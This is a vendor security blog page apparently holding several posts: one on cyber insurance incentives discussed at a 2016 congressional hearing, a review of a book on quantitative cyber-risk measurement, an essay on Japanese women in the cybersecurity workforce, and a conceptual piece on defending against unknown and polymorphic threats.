When it comes to cybersecurity, the U.S. federal government recognizes the carrot is more effective than the stick. Instead of using regulations to increase data security and protect personal information within private organizations, the White House is enlisting the insurance industry to offer incentives for adopting security best practices.
In March 2016, the U.S. House Homeland Security Cybersecurity Subcommittee held a hearing to explore possible market-driven cyber insurance incentives. The idea, said Rep. John Ratcliffe, chairman of the subcommittee, is to enable “all boats to rise, thereby advancing the security of the nation.”
The issue isn’t a lack of cyber insurance. Today, 80% of companies with more than 1,000 employees have a standalone cybersecurity policy, according to a Risk and Insurance Management Society survey. The real issue is getting companies to maintain more than a minimum set of security standards.
Borrowing from the fire insurance playbook The insurance industry has been a catalyst for change in the past. Attendees of the Homeland Security Cybersecurity Subcommittee hearing pointed to the fire insurance market as a good example of using a carrot to drive positive behavior. Insurers offer lower rates to policyholders who adhere to certain fire safety standards, such as installing sprinklers and having extinguishers nearby.
Executive leadership: what boards of directors should do to build corporate cultures that manage cyber risk well.
Education and awareness: training and other mechanisms that are necessary to foster a culture of cybersecurity.
Technology: specific technologies that can improve cybersecurity protections.
Information sharing: ensuring the right people within the company have the information they need to enhance cybersecurity risk investments.
Spurring much-needed actuarial data The hearing also touched on a major missing element in the current cyber insurance industry: reliable actuarial data regarding data breaches and other cyber incidents. Auto insurers know the likelihood of car accidents, so they know how to price the liability and measure the risk. But the likelihood and ramifications of various data breaches are a wildcard today, leading to problems in pricing cybersecurity policies.
Hearing attendees discussed creating an actuarial data repository with data from leading actuarial firms, forensic technology firms and individual insurer cyber claims. The proposed database would be housed at a nongovernmental location such as the Insurance Services Office Inc. (ISO), which has managed insurer actuarial databases for more than four decades. The hope is the database would encourage voluntary sharing of information about data breaches, business interruption events and cybersecurity controls to aid in risk mitigation.
While the cyber insurance carrot is a long way from becoming reality, at least the seed has been planted.
We modeled the Cybersecurity Canon after the Baseball or Rock & Roll Hall-of-Fame, except for cybersecurity books. We have more than 25 books on the initial candidate list, but we are soliciting help from the cybersecurity community to increase the number to be much more than that. Please write a review and nominate your favorite.
The Cybersecurity Canon is a real thing for our community. We have designed it so that you can directly participate in the process. Please do so!
How to Measure Anything in Cybersecurity Risk is a book that reads like a college statistics textbook (but the good kind you highlight a lot). It is a book anyone who is responsible for measuring risk, developing metrics, or determining return on investment should read. It is grounded in classic quantitative analysis methodologies and provides a good balance of background and practical examples. This book belongs in the Cybersecurity Canon under Governance Risk and Compliance (GRC).
Review
As I said, this book reads like an education in quantitative modeling and how to apply the methodology to cybersecurity. It truly challenges the current common practices in use to develop expert opinion-based risk frameworks. Here is a snippet from the book:
“So let’s be clear about our position on current methods: They are a failure. They do not work. A thorough investigation of the research on these methods and decision-making methods in general indicates the following: There is no evidence that the types of scoring and risk matrix methods widely used in cybersecurity improve judgment. On the contrary, there is evidence these methods add noise and error to the judgment process. Any appearance of “working” is probably a type of “analysis placebo.” That is, a method may make you feel better even though the activity provides no measurable improvement in estimating risks (or even adds error). There is overwhelming evidence in published research that quantitative, probabilistic methods are effective. Fortunately, most cybersecurity experts seem willing and able to adopt better quantitative solutions. But common misconceptions held by some—including misconceptions about basic statistics—create some obstacles for adopting better methods. How cybersecurity assesses risk, and how it determines how much it reduces risk, are the basis for determining where cybersecurity needs to prioritize the use of resources. And if this method is broken—or even just leaves room for significant improvement—then that is the highest-priority problem for cybersecurity to tackle!”
The authors lay out the book in three sections:
Part I sets the stage for reasoning about uncertainty in security. It outlines terms on things like security, uncertainty, measurement and risk management. Plus, it argues against toxic misunderstandings of these terms and why we need a better approach to measuring cybersecurity risk and, for that matter, measuring the performance of cybersecurity risk analysis itself. Finally, it introduces a simple quantitative method that could serve as a starting point for anyone, no matter how averse the person may be to complexity.
Part II delves further into evolutionary steps we can take with a simple quantitative model. It explains how to add further complexity to a model and how to use even minimal amounts of data to improve those models.
Part III describes what is needed to implement these methods in the organization. It addresses the implications of this book for the entire cybersecurity “ecosystem,” including standards organizations and vendors.
The cybersecurity community suffers from not having standard evaluation metrics, like earnings before interest, taxes, depreciation and amortization (EBITDA). The authors try to bring some discipline to terms by offering standard definitions coming from the quantitative analytics field. From the book:
Definitions for Uncertainty and Risk, and Their Measurements Uncertainty: The lack of complete certainty, that is, the existence of more than one possibility. The “true” outcome/state/ result/value is not known. Measurement of Uncertainty: A set of probabilities assigned to a set of possibilities. For example: “There is a 20% chance we will have a data breach sometime in the next five years.” Risk: A state of uncertainty where some of the possibilities involve a loss, catastrophe, or other undesirable outcome. Measurement of Risk: A set of possibilities, each with quantified probabilities and quantified losses. For example: “We believe there is a 10% chance that a data breach will result in a legal liability exceeding $10 million.”
They also walk the reader through established methodologies like: Monte Carlo simulations, Bayesian interpretation, risk matrix, loss exceedance curve, heat maps, chain rule tree, beta distribution changes, regression model predations, analytics maturity mode, power law distribution, subjective probability, calibration, dimensional modeling, expected opportunity loss, bunch of guys sitting around talking, expected value of prefect information, NIST and ISO. They explain how, in Excel, so they are truly practical. They also lay out survey results from attitudes toward quantitative methods, global information security workforce study, and stats literacy and acceptance studies.
This work follows other work like Factor Analysis of Information Risk (FAIR) which is a well-recognized value at risk (VaR) framework. They outline another Monte Carlo–based methodology and tools like those developed by Jack Jones and Jack Freund. Another similar work is The Wisdom of Crowds by James Surowiecki.
Finally the book has some great online resources. You can find eight sample downloads of the methods explained, as well as webinar/blog info.
Conclusion
How to Measure Anything in Cybersecurity Risk is an extension of Hubbard’s successful first book, How to Measure Anything: Finding the Value of “Intangibles” in Business. It lays out why statistical models beat expertise every time. It is a book anyone who is responsible for measuring risk, developing metrics, or determining return on investment should read. It provides a strong foundation in qualitative analytics with practical application guidance.
Bottom line: The authors lay out a solid case for why other industries with the similar challenges of lack of quantifiable, standardized or historical actuarial table-like data are able to use classic statistical modeling and methodologies to measure risk in a qualified, repeatable way. Definitely worth considering.
I was asking myself that question while participating in the Grace Hopper Celebration of Women in Computing conference last month, one of the largest global conferences for women in IT.
At the conference, I spoke with dozens of female college students majoring in computer science and cybersecurity in the United States. About half of the women I spoke with were American students, while the other half were students from India and China who were studying in the U.S. and ultimately hoped to stay and work in cybersecurity after graduation. But during my time at the conference I found myself asking, where were the women from my home country, Japan?
At the 2016 Grace Hopper Conference.
Seven years ago, I moved from Japan to the U.S. to pursue my graduate degree in international relations and economics at Johns Hopkins University and later conducted research on Japan–U.S. cybersecurity cooperation as a Fulbright scholar. I’ve also worked at the Japanese Ministry of Defense, a U.S. think tank that specializes in international security, and at Japanese and American tech companies. During this time, I’ve met few Japanese women working in the cybersecurity and tech industries overseas.
I began to investigate why and found a few factors that may explain why more Japanese women aren’t pursuing cyber jobs. It’s important now, more than ever, for women to enter this field.
This demographic reality is compounded by gendered one: a smaller percentage of Japanese girls report that they want to pursue professional careers in engineering and computing than the global average, according to an OECD survey report in 2012. While the global average is approximately five percent, the figure is about three percent in Japan and the U.S. On the other hand, the global average of boys who want to pursue careers in engineering and computing is 18 percent. Broken out, that figure is 15 percent in Japan and 17 percent in the U.S.
One survey report by the Japanese Ministry of Education in March 2015found that 9.1 percent of Japanese male college students work in the Information and Communications Technology (ICT) field, compared with just 6 percent of Japanese female students. The ratio of female students (44.9 percent) to male students (40.0 percent) who pursue a bachelor’s degree is noticeably higher in Japan. It indicates that fewer female students in Japan are choosing to pursue a career in tech.
Perhaps this is why I rarely see Japanese men or women (particularly the latter) at international cybersecurity conferences outside of Japan, particularly in the U.S., U.K. and France. There are also practical and cultural reasons for this: It is often challenging for non-native English speakers to draft proposals and deliver complex technical or international security conference presentations in their non-native tongue. Additionally, Japanese culture traditionally discourages people to speak up in a meeting to challenge a different opinion or idea because it disrupts group harmony, a priority in Japanese culture. Based on my own experience, the pressure of this tradition is even greater for women.
This lack of visibility is problematic because Japan is losing out on opportunities to provide and learn from different perspectives in global cybersecurity discussions. And it needs to be part of this global dialogue more than ever. That’s because Japan is hosting the Tokyo Summer Olympic Games in 2020, which prompted the government to publish the Japanese Cybersecurity Strategy in 2015, a vision about how to secure Japan and prepare for Tokyo 2020 for the next three years. One of its key arguments is that top-notch cybersecurity professionals need to be global and should play an active role beyond national borders since cybersecurity is a global challenge. As of 2014, Japan had approximately 265,000 information security professionals (160,000 of this group reportedly need more training) and a shortfall of roughly 80,000 professionals.
Like the rest of the world, Japan’s cybersecurity workforce shortfall is one that could hurt the country’s security in the long term. The Japanese government is well aware of the risk and finding ways to address the challenge.
That’s one reason why Japan’s efforts to cultivate a larger and global cybersecurity workforce will soon need to include diversity discussions like those happening in the U.S., determining how to recruit and retain groups that have been underrepresented in the cybersecurity workforce — like women. This is a place where Japan could be a global leader, if the private and public sectors make some of the necessary changes together, learning from the best practices of other nations and creating some of their own.
Still, it will be tough to remove some of the obstacles that are holding back women (and men) from the global cybersecurity workforce, and it won’t happen overnight. Japanese cybersecurity professionals will still face a language barrier and encounter cultural differences when joining international cybersecurity discussions and conferences. But joining in these discussions will ultimately help Japan, and the world, become more secure.
It can be scary to some women — particularly Japanese women — to be the minority in a conference room. It might require courage to speak up at a meeting. But as cybersecurity challenges grow increasingly complex and global, these perspectives representing different cultures and backgrounds will become even more important and valuable to the discussion. Think of yourself as an ambassador, paving the way and bridging the gap for other people from your community, country or culture. And you’re not alone; I will do my part and look forward to seeing you at future conferences, or hopefully, as a colleague.
Most traditional security products are built to act based on known threats. The moment they see something that is known to be malicious, they block it. To get past security products that successfully block known threats, attackers are forced to create something that is previously unknown. How do they do it, and what can we do to prevent both known and unknown threats?
Let’s look at a few scenarios:
Recycle the Threat
Recycled threats are considered to be the most cost-effective attack method, which is why attackers often recycle existing threats using previously proven techniques. What makes these recycled threats somewhat “unknown” lies within the limited memory of security products. All security products have limited memory, and security teams choose the most up-to-date threats to protect against, hoping they can block the majority of incoming attacks. If an old threat not tracked by the security product attempts to enter the network, it could bypass the security product because it is not categorized as something seen before.
To protect against these “unknown” recycled threats, it is critical to have access to a threat intelligence memory keeper, these days often placed in an elastic cloud infrastructure capable of scaling to address the volume of threat data. In the event that a security product doesn’t have a particular threat identified and stored, access to the larger knowledge base of threat intelligence could help determine if something is malicious and enable the security product to block it.
Modify Existing Code
This method is somewhat more expensive than recycling threats. Attackers take an existing threat and make slight modifications to the code, either manually or automatically, as the threat actively transitions in the network. This results in polymorphic malware or a polymorphic URL. Like a virus, the malware continuously and automatically morphs and changes rapidly. If a security product identifies the original threat as known and creates a protection for it based on one variation only, any slight change to the code will turn that threat into an unknown. Some security products match threats using hash (#) technology, which generates a number based on a string of text in such a way that it is extremely unlikely that some other text will produce the same hash value. In our context, the hash value only matches one variation of the threat, so any new variation of the threat will be considered new and unknown.
To better protect against this threats security products needs to use smart signatures. Smart signatures are based on the content and patterns of traffic and files, rather than on a hash, and can identify and protect against modifications and variations of a known threat. The focus on the behavior, rather than the appearance of fixed encoding, allows for the detection of patterns in modified malware.
Create a New Threat
Attackers who are more determined and willing to invest the money will create an entirely new threat with purely new code. All aspects of the cyber attack lifecycle have to be new for an attack to truly be considered a previously unknown threat.
Focus on Business Behavior
Protecting against these new threats requires focus on your unique business behavior and data flows. This information can then be implemented into cybersecurity best practices. As an example, leveraging zoning with user ID and application ID, can help prevent new threats from spreading around your organization and block downloads from new, unknown and unclassified websites.
Utilize Collective Intelligence
No single organization will ever initially experience all new threats globally, which is why it is so important to be able to benefit from collective threat intelligence. Targeted attacks with unknown, never-before-seen threats can quickly become known with global information sharing. When a new threat is analyzed and detected in one organization, the newly identified threat information can be distributed across the community, with mitigations deployed a head of time to limit the spread of attacks and their effectiveness globally.
Turning unknown threats into known and actively prevent against them can happen in a combined environment. First, you need to predict the next attack step and location. Second, you need to be able to develop and deliver protection quickly to the enforcement point in order to stop it.
When a truly new threat enters your organization, the first line of defense is having cybersecurity best practices that are specific to the organization. At the same time, you should be sending unknown files and links for analysis. The effectiveness of sandbox analysis is depended on the time it takes to provide an accurate verdict on an unknown threat and the time necessary to create and implement protections across the organization. Your security posture needs to be changed fast enough to block the threat before it has the ability to progress – in other words, as soon as possible. And to ensure that this threat does not further traverse the network, preventions need to be created and implemented automatically across all security products faster than the threat can productively spread.
A recent SANS survey reported that 40 percent of attacks have previously unknown elements. The ability to detect unknown threats and prevent successful attacks defines the effectiveness of your security deployment. A true next-generation security platform is agile, quickly turning unknown threats into known protection and prevention on a global level. Automatically sharing new threat data while extending new protections throughout the organization to stop the spread of an attack. Learn more about the Palo Alto Networks Next-Generation Security Platform.
